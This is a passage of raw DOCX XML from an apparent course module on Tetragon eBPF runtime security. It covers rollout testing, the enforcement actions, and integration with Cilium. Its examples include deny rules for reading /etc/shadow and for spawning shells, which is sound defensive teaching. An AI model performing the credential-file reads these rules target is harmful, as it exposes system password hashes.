        <w:t xml:space="preserve">Before enforcement, test thoroughly:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.6.1 Dry Run in Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy to dev cluster with action: Post (observability only). Generate the behaviors the policy should catch. Verify events appear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.6.2 False Positive Check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the cluster's normal workload. Watch for UNEXPECTED events. Each one represents a potential false positive for enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.6.3 Staged Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy to production in observability mode. Collect data for a week. Review every event — is it expected? Adjust selectors to rule out false positives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.6.4 Enable Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After confirming zero false positives, convert actions to Override or Signal. Monitor carefully for the first 24-48 hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.6.5 Kill-Switch Drill</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Practice disabling the policy: kubectl delete tracingpolicy block-etc-shadow. Time this. Ensure your on-call team can do it under pressure.</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11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Real-Time Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.1 The Action Vocabulary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon supports several actions, each with different semantics. Choosing the right action is part of policy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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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Effect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Post</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Emit event (observability only)</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Override</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Change syscall return to error (deny)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Signal</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Send signal to process (often SIGKILL)</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NoPost</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Suppress event emission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FollowFD / UnfollowFD / CopyFD</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File-descriptor tracking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GetUrl</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HTTP GET (integration with external)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DnsLookup</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DNS resolution (rarely used)</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NotifyEnforcer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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Signal another component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Sigkill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Shorthand for Signal SIGKILL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.2 Post — Observability Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post is the SAFE DEFAULT. The event is emitted; the underlying operation proceeds normally. No impact on running applications. Used for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection-only policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observability during the observability-first rollout phase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Forensic logging — record everything, block selectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.3 Override — Syscall Denial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Override changes the RETURN VALUE of the matched syscall. The application sees the syscall fail. Commonly:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">argError: -1 → EPERM ("Operation not permitted").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">argError: -13 → EACCES ("Permission denied").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">argError: -2 → ENOENT ("No such file").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The choice matters. ENOENT might trick the attacker into thinking the file doesn't exist (stealthy). EPERM/EACCES clearly signals denial (obvious).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.3.1 What the Application Sees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// Application code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int fd = open("/etc/shadow", O_RDONLY);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// fd == -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// errno == EPERM ("Operation not permitted")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application gets a normal syscall failure. No indication Tetragon was involved. From its perspective, it's a permissions issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.4 Signal — Process Termination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Signal sends a Linux signal to the process that matched. Typically SIGKILL (9) to terminate. But you could use other signals:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIGKILL (9) — immediate termination, not catchable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIGTERM (15) — graceful termination request (process could ignore).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIGSTOP (19) — pause the process (for investigation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIGKILL is the usual choice for enforcement. It CANNOT be caught or ignored. The process dies immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Important: Signal doesn't stop the ACTION itself — the syscall that matched. It kills the process AFTER the syscall completes. But if the syscall is "read /etc/shadow," the process dies before it can do anything with the data:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Process: syscall returns data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Process: receives SIGKILL (queued before next instruction)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Process: DIES before it can process or exfiltrate the data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The data technically LEAKED to the process's memory briefly, but the process died before doing anything with it. Containment is effective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For TRUE PREVENTION (the data never even crossing into userspace), use Override, not Signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.5 Choosing Between Override and Signal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decision factors:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.5.1 Override (Deny Syscall)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data never reaches the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process can continue running (maybe try again, maybe move on).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stealthier — process might not realize it's being blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Requires BPF LSM hook that supports denial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.5.2 Signal (Kill Process)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process is immediately terminated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Visible impact — the pod likely restarts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">More aggressive — use when the presence of the process is itself the issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Works from any hook (not LSM-specific).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.5.3 Example Choices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Attempt to read /etc/shadow" → OVERRIDE. Prevent data access; let the process continue (it's likely still doing legit work).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Unauthorized shell spawned" → SIGNAL. The shell ITSELF is the threat. Kill it. The pod restarts; legitimate traffic is unaffected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Ransomware-pattern file ops" → SIGNAL. Stop the whole process. Override of individual file operations isn't enough if the process is actively malicious.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.6 NoPost — Silencing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NoPost suppresses event emission. Used when a policy matches many events, most of which you DON'T want to see. Combined with selectors, it filters:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># A policy matches many cases;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use NoPost to suppress events from known-good processes,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># only emitting events from suspicious ones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selectors:</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"In"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    values: ["/usr/bin/known-good"]</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"NoPost"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 ["/usr/bin/known-good"]</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"Post"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Useful for noise reduction at the policy level — don't even emit events that aren't interesting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">11.7 Combining Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies can have multiple selectors with different actions. One policy can observe some cases and block others:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># "Log all execs in container; kill shells specifically"</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selectors:</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"In"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    values: ["/bin/bash", "/bin/sh"]</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- matchArgs:  # All other execs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"Prefix"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    values: ["/usr"]</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"Post"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flexible. Granular. Express complex policy logic in one CRD.</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12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Cilium Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.1 Three Pillars, One Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isovalent's vision: eBPF as the unified foundation for three critical platform capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NETWORKING — Cilium (Module 4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OBSERVABILITY — Hubble (Cilium's network observability; similar spirit to Pixie but network-focused).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SECURITY — Tetragon (this module).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each uses eBPF. Each integrates with the others. Together, they cover the cloud-native security and observability landscape with a unified architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.2 Running Tetragon Without Cilium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Important: Tetragon is INDEPENDENT of Cilium. You don't need Cilium to run Tetragon. Tetragon works fine alongside any CNI (Flannel, Calico, Weave, AWS VPC, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The components ARE separate. Tetragon's DaemonSet doesn't interact with Cilium's DaemonSet by default. They coexist without coordination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This decoupling is intentional. Not every Tetragon user runs Cilium; Tetragon's value proposition should be independent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.3 Running Tetragon With Cilium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When you DO have both, integrations become valuable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
